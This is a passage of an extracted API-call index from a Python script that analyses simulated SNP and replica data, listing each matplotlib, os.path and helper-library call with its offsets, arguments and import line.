compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((14149, 14176), 'matplotlib.pyplot.subplot', 'pp.subplot', (['(2)', '(1)', '(which + 1)'], {}), '(2, 1, which + 1)\n', (14159, 14176), True, 'import matplotlib.pyplot as pp\n'), ((14188, 14205), 'matplotlib.pyplot.xlabel', 'pp.xlabel', (['xlabel'], {}), '(xlabel)\n', (14197, 14205), True, 'import matplotlib.pyplot as pp\n'), ((14216, 14233), 'matplotlib.pyplot.ylabel', 'pp.ylabel', (['ylabel'], {}), '(ylabel)\n', (14225, 14233), True, 'import matplotlib.pyplot as pp\n'), ((14245, 14258), 'matplotlib.pyplot.hold', 'pp.hold', (['(True)'], {}), 
'(True)\n', (14252, 14258), True, 'import matplotlib.pyplot as pp\n'), ((16261, 16276), 'matplotlib.pyplot.title', 'pp.title', (['title'], {}), '(title)\n', (16269, 16276), True, 'import matplotlib.pyplot as pp\n'), ((17233, 17269), 'Operations.MiscUtil.ReplaceFileExt', 'ReplaceFileExt', (['histFiles[0]', '""".png"""'], {}), "(histFiles[0], '.png')\n", (17247, 17269), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((17974, 18001), 'Operations.MiscUtil.Histogrammer.load', 'Histogrammer.load', (['histFile'], {}), '(histFile)\n', (17991, 18001), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((18554, 18608), 'matplotlib.pyplot.plot', 'pp.plot', (['binLefts', 'binCounts'], {'label': 'label', 'color': 'color'}), '(binLefts, binCounts, label=label, color=color)\n', (18561, 18608), True, 'import matplotlib.pyplot as pp\n'), ((18900, 18970), 'matplotlib.pyplot.figlegend', 'pp.figlegend', ([], {'loc': '"""lower center"""', 'labels': 'theLabels', 'handles': 'theHandles'}), "(loc='lower center', labels=theLabels, handles=theHandles)\n", (18912, 18970), True, 'import matplotlib.pyplot as pp\n'), ((20992, 21016), 'os.path.dirname', 'os.path.dirname', (['outFile'], {}), '(outFile)\n', (21007, 21016), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((21030, 21058), 'os.path.join', 'os.path.join', (['Ddata', 'outFile'], {}), '(Ddata, outFile)\n', (21042, 21058), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((26771, 26785), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (26783, 26785), False, 'from Operations.Shari_Operations.localize.Scenario import 
GetScenarios, GetSelectionScenarios\n'), ((28781, 28805), 'os.path.dirname', 'os.path.dirname', (['outFile'], {}), '(outFile)\n', (28796, 28805), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((28819, 28847), 'os.path.join', 'os.path.join', (['Ddata', 'outFile'], {}), '(Ddata, outFile)\n', (28831, 28847), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((32803, 32831), 'os.path.dirname', 'os.path.dirname', (['condsFileFN'], {}), '(condsFileFN)\n', (32818, 32831), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((33333, 33350), 'Classes.DotData.DotData', 'DotData', ([], {'SVPath': 'f'}), '(SVPath=f)\n', (33340, 33350), False, 'from Classes.DotData import DotData\n'), ((33541, 33563), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (33560, 33563), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((33609, 33634), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['replicaCond'], {}), '(replicaCond)\n', (33621, 33634), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((34015, 34038), 'itertools.izip', 'izip', (['*matchingReplicas'], {}), '(*matchingReplicas)\n', (34019, 34038), False, 'from itertools import izip\n'), ((35721, 35746), 'os.path.dirname', 'os.path.dirname', (['inFileFN'], {}), '(inFileFN)\n', (35736, 35746), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((35824, 35852), 'os.path.dirname', 'os.path.dirname', (['condsFileFN'], {}), '(condsFileFN)\n', (35839, 35852), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((35979, 36014), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['inFileFN', 'sfx', 'condName'], {}), '(inFileFN, sfx, 
condName)\n', (35989, 36014), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((37353, 37379), 'os.path.dirname', 'os.path.dirname', (['outFileFN'], {}), '(outFileFN)\n', (37368, 37379), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((37459, 37487), 'os.path.dirname', 'os.path.dirname', (['condsFileFN'], {}), '(condsFileFN)\n', (37474, 37487), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((37747, 37783), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFileFN', 'sfx', 'condName'], {}), '(outFileFN, sfx, condName)\n', (37757, 37783), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((39535, 39549), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (39547, 39549), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((42268, 42326), 'matplotlib.pyplot.plot', 'pp.plot', (['[start, start + rng]', '[start, start + rng]', '"""g--"""'], {}), "([start, start + rng], [start, start + rng], 'g--')\n", (42275, 42326), True, 'import matplotlib.pyplot as pp\n'), ((42412, 42427), 'matplotlib.pyplot.title', 'pp.title', (['title'], {}), '(title)\n', (42420, 42427), True, 'import matplotlib.pyplot as pp\n'), ((43883, 43905), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (43902, 43905), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((48543, 48593), 'Operations.MiscUtil.dbg', 'dbg', (['"""numReplicasSkippedTot numReplicasAllowedTot"""'], {}), "('numReplicasSkippedTot numReplicasAllowedTot')\n", (48546, 48593), False, 'from 
Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53212, 53267), 'Operations.MiscUtil.dbg', 'dbg', (['""""finalCount" numSnpsSkippedTot numSnpsAllowedTot"""'], {}), '(\'"finalCount" numSnpsSkippedTot numSnpsAllowedTot\')\n', (53215, 53267), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53832, 53890), 'Operations.IDotData.IDotData.openForWrite', 'IDotData.openForWrite', (['replicaStatFN', 'snpStatFile.headings'], {}), '(replicaStatFN, snpStatFile.headings)\n', (53853, 53890), False, 'from Operations.IDotData import IDotData\n'), ((2643, 2805), 'Classes.DotData.DotData', 'DotData', ([], {'SVPath': 'posFileNames[replicaNum]', 'SVSkipFirstLines': '(1)', 'SVHeader': '(False)', 'names': "['SNP', 'CHROM', 'CHROM_POS', 'ALLELE1', 'FREQ1', 'ALLELE2', 'FREQ2']"}), "(SVPath=posFileNames[replicaNum], SVSkipFirstLines=1, SVHeader=False,\n names=['SNP', 'CHROM', 'CHROM_POS', 'ALLELE1', 'FREQ1', 'ALLELE2', 'FREQ2']\n )\n", (2650, 2805), False, 'from Classes.DotData import DotData\n'), ((6929, 6955), 'os.path.splitext', 'os.path.splitext', (['snpTable'], {}), '(snpTable)\n', (6945, 6955), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((7530, 7553), 'itertools.izip', 'izip', (['*replicaTableVals'], {}), '(*replicaTableVals)\n', (7534, 7553), False, 'from itertools import izip\n'), ((8212, 8271), 'Operations.MiscUtil.dbg', 'dbg', (['"""replica useThisReplica histogramBuilder.getNumVals()"""'], {}), "('replica useThisReplica histogramBuilder.getNumVals()')\n", (8215, 8271), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, 
PrintDictDiff\n'), ((16328, 16398), 'matplotlib.pyplot.figlegend', 'pp.figlegend', ([], {'loc': '"""lower center"""', 'labels': 'theLabels', 'handles': 'theHandles'}), "(loc='lower center', labels=theLabels, handles=theHandles)\n", (16340, 16398), True, 'import matplotlib.pyplot as pp\n'), ((26239, 26301), 'Operations.MiscUtil.Dict', 'Dict', (['"""snpStat replicaConds snpConds scenCond subplots_adjust"""'], {}), "('snpStat replicaConds snpConds scenCond subplots_adjust')\n", (26243, 26301), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((31839, 31878), 'Operations.MiscUtil.Dict', 'Dict', (['"""replicaStat sfx subplots_adjust"""'], {}), "('replicaStat sfx subplots_adjust')\n", (31843, 31878), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((33926, 33948), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (33945, 33948), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((34334, 34410), 'Operations.IDotData.IDotData', 'IDotData', ([], {'names': "(('replicaNum', 'matchingConds') + condNames)", 'Records': 'Records'}), "(names=('replicaNum', 'matchingConds') + condNames, Records=Records)\n", (34342, 34410), False, 'from Operations.IDotData import IDotData\n'), ((41961, 42006), 'Operations.MiscUtil.Dict', 'Dict', (['"""x y urls"""'], {'c': "(colors if colors else 'b')"}), "('x y urls', c=colors if colors else 'b')\n", (41965, 42006), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((43025, 43053), 'Operations.MiscUtil.DictGet', 'DictGet', (['scen2sfxs', 'scen', 
'""""""'], {}), "(scen2sfxs, scen, '')\n", (43032, 43053), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((44749, 44764), 'ast.parse', 'ast.parse', (['expr'], {}), '(expr)\n', (44758, 44764), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((45874, 45896), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaTables'], {}), '(replicaTables)\n', (45881, 45896), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46091, 46140), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx scenCond allScens scen2sfxs"""'], {}), "('Ddata thinSfx scenCond allScens scen2sfxs')\n", (46095, 46140), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((47024, 47072), 'logging.info', 'logging.info', (['""""findReplicasMatchingConds" scen"""'], {}), '(\'"findReplicasMatchingConds" scen\')\n', (47036, 47072), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((48356, 48419), 'Operations.MiscUtil.dbg', 'dbg', (['""""in_scenario" scen numReplicasSkipped numReplicasAllowed"""'], {}), '(\'"in_scenario" scen numReplicasSkipped numReplicasAllowed\')\n', (48359, 48419), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((49380, 49398), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpTables'], {}), '(snpTables)\n', (49387, 49398), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, 
ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50433, 50469), 'Operations.MiscUtil.dbg', 'dbg', (['""""findSnpsMatchingConds" scen """'], {}), '(\'"findSnpsMatchingConds" scen \')\n', (50436, 50469), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50898, 50946), 'Operations.MiscUtil.dbg', 'dbg', (['"""scen len(replicasHereSet) replicasHereSet"""'], {}), "('scen len(replicasHereSet) replicasHereSet')\n", (50901, 50946), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((51013, 51079), 'Operations.MiscUtil.dbg', 'dbg', (['"""#[ ( thisScenDict[ snpTable ] ) for snpTable in snpTables ]"""'], {}), "('#[ ( thisScenDict[ snpTable ] ) for snpTable in snpTables ]')\n", (51016, 51079), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53153, 53200), 'Operations.MiscUtil.dbg', 'dbg', (['"""scen numSnpsSkippedTot numSnpsAllowedTot"""'], {}), "('scen numSnpsSkippedTot numSnpsAllowedTot')\n", (53156, 53200), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((4784, 4836), 'Operations.MiscUtil.Dict', 'Dict', (['"""scen Ddata simsOut thinSfx thinExt nreplicas"""'], {}), "('scen Ddata simsOut thinSfx thinExt nreplicas')\n", (4788, 4836), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, 
PrintDictDiff\n'), ((7180, 7223), 'Operations.MiscUtil.Dict', 'Dict', (['"""scenDir snpCond replicaCond snpStat"""'], {}), "('scenDir snpCond replicaCond snpStat')\n", (7184, 7223), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((8077, 8095), 'numpy.isnan', 'np.isnan', (['r0.Chrom'], {}), '(r0.Chrom)\n', (8085, 8095), True, 'import numpy as np\n'), ((18198, 18246), 'Operations.MiscUtil.dbg', 'dbg', (['"""hist.binSize binSize hist.binSize-binSize"""'], {}), "('hist.binSize binSize hist.binSize-binSize')\n", (18201, 18246), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((18624, 18695), 'Classes.DotData.DotData', 'DotData', ([], {'names': "('binLefts', 'binCounts')", 'Columns': '(binLefts, binCounts)'}), "(names=('binLefts', 'binCounts'), Columns=(binLefts, binCounts))\n", (18631, 18695), False, 'from Classes.DotData import DotData\n'), ((18994, 19002), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (19000, 19002), True, 'import matplotlib.pyplot as pp\n'), ((19040, 19048), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (19046, 19048), True, 'import matplotlib.pyplot as pp\n'), ((29450, 29475), 'os.path.basename', 'os.path.basename', (['outFile'], {}), '(outFile)\n', (29466, 29475), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((29683, 29850), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables replicaCond replicaStat nreplicas binSize scenCond scen2sfxs allScens nameSfx sfx replicaCondSfx"""'], {'outFile': 'totaledHistFile'}), "(\n 'Ddata thinSfx replicaTables replicaCond replicaStat nreplicas binSize scenCond scen2sfxs allScens nameSfx sfx replicaCondSfx'\n , outFile=totaledHistFile)\n", 
(29687, 29850), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((31705, 31717), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (31708, 31717), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((33803, 33826), 'itertools.izip', 'izip', (['*replicaTableVals'], {}), '(*replicaTableVals)\n', (33807, 33826), False, 'from itertools import izip\n'), ((34858, 35111), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata scenario nreplicas thinSfx"""'], {'replicaTables': "('replicaStats',)", 'replicaConds': "(('all', 'True'), ('hi', 'replicaStats.causalAlleleFreq >= .5'), ('lo',\n 'replicaStats.causalAlleleFreq < .5'))", 'condsFileFN': '"""commonReplicaConds.tsv"""'}), "('Ddata scenario nreplicas thinSfx', replicaTables=('replicaStats',),\n replicaConds=(('all', 'True'), ('hi',\n 'replicaStats.causalAlleleFreq >= .5'), ('lo',\n 'replicaStats.causalAlleleFreq < .5')), condsFileFN=\n 'commonReplicaConds.tsv')\n", (34862, 35111), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((42052, 42060), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (42058, 42060), True, 'import matplotlib.pyplot as pp\n'), ((42098, 42106), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (42104, 42106), True, 'import matplotlib.pyplot as pp\n'), ((43099, 43113), 'Operations.MiscUtil.IsSeq', 'IsSeq', (['scenSfx'], {}), '(scenSfx)\n', (43104, 43113), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, 
PrintDictDiff\n'), ((45819, 45836), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showVals'], {}), '(showVals)\n', (45826, 45836), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((47231, 47267), 'Operations.IDotData.IDotData', 'IDotData', (['thisScenDict[replicaTable]'], {}), '(thisScenDict[replicaTable])\n', (47239, 47267), False, 'from Operations.IDotData import IDotData\n'), ((47963, 47980), 'Operations.MiscUtil.dbg', 'dbg', (['"""scen vdict"""'], {}), "('scen vdict')\n", (47966, 47980), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((51111, 51143), 'Operations.IDotData.IDotData', 'IDotData', (['thisScenDict[snpTable]'], {}), '(thisScenDict[snpTable])\n', (51119, 51143), False, 'from Operations.IDotData import IDotData\n'), ((54344, 54383), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata scenario snpStatFN posCol"""'], {}), "('Ddata scenario snpStatFN posCol')\n", (54348, 54383), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7111, 7139), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (7121, 7139), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7920, 7937), 'numpy.isnan', 'np.isnan', (['r.Chrom'], {}), '(r.Chrom)\n', (7928, 7937), True, 'import numpy as np\n'), ((10057, 10069), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (10060, 10069), False, 'from Operations.MiscUtil import 
Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11697, 11709), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (11700, 11709), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13690, 13709), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (13706, 13709), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((15822, 15844), 'Operations.MiscUtil.Dict', 'Dict', (['"""left color log"""'], {}), "('left color log')\n", (15826, 15844), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((16426, 16434), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (16432, 16434), True, 'import matplotlib.pyplot as pp\n'), ((16476, 16484), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (16482, 16484), True, 'import matplotlib.pyplot as pp\n'), ((17321, 17340), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (17337, 17340), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((26050, 26161), 'Operations.MiscUtil.Dict', 'Dict', (['"""xlabel ylabel title xbound ybound coarsenBy log outFile cumulative normed ticksCoarsen colors"""'], {}), "(\n 'xlabel ylabel title xbound ybound coarsenBy log outFile cumulative normed ticksCoarsen colors'\n )\n", (26054, 26161), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((31483, 31606), 'Operations.MiscUtil.Dict', 'Dict', (['"""xlabel ylabel title xbound ybound 
coarsenBy log outFile sfx ticksCoarsen cumulative normed cumulativeUpTo"""'], {}), "(\n 'xlabel ylabel title xbound ybound coarsenBy log outFile sfx ticksCoarsen cumulative normed cumulativeUpTo'\n )\n", (31487, 31606), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((36313, 36379), 'functools.partial', 'functools.partial', (['IDotData.openForWrite'], {'headings': 'inFile.headings'}), '(IDotData.openForWrite, headings=inFile.headings)\n', (36330, 36379), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((40262, 40274), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (40265, 40274), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((40727, 40749), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (40746, 40749), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((41098, 41120), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (41117, 41120), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((43503, 43568), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (["(table + ('.tsv' if '.' not in table else ''))", 'scenSfx'], {}), "(table + ('.tsv' if '.' 
not in table else ''), scenSfx)\n", (43513, 43568), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46695, 46701), 'Operations.MiscUtil.Sfx', 'Sfx', (['i'], {}), '(i)\n', (46698, 46701), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46885, 46906), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showHeadings'], {}), '(showHeadings)\n', (46892, 46906), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50364, 50385), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showHeadings'], {}), '(showHeadings)\n', (50371, 50385), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((23132, 23157), 'os.path.basename', 'os.path.basename', (['outFile'], {}), '(outFile)\n', (23148, 23157), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((50673, 50733), 'Operations.MiscUtil.Dict', 'Dict', (['"""replicaTables replicaCond scenCond"""'], {'allScens': '(scen,)'}), "('replicaTables replicaCond scenCond', allScens=(scen,))\n", (50677, 50733), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((52310, 52347), 'Operations.MiscUtil.dbg', 'dbg', (['""""SKIPPING_REPLICA" thisReplica"""'], {}), '(\'"SKIPPING_REPLICA" thisReplica\')\n', (52313, 52347), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, 
Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((6547, 6573), 'os.path.splitext', 'os.path.splitext', (['snpTable'], {}), '(snpTable)\n', (6563, 6573), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((32681, 32711), 'os.path.splitext', 'os.path.splitext', (['replicaTable'], {}), '(replicaTable)\n', (32697, 32711), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((43328, 43351), 'os.path.splitext', 'os.path.splitext', (['table'], {}), '(table)\n', (43344, 43351), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((22009, 22034), 'os.path.basename', 'os.path.basename', (['outFile'], {}), '(outFile)\n', (22025, 22034), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((33256, 33278), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (33275, 33278), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((22488, 22618), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables replicaCond snpTables snpCond snpStat nreplicas binSize binShift scenDir scenSfx sfx"""'], {}), "(\n 'Ddata thinSfx 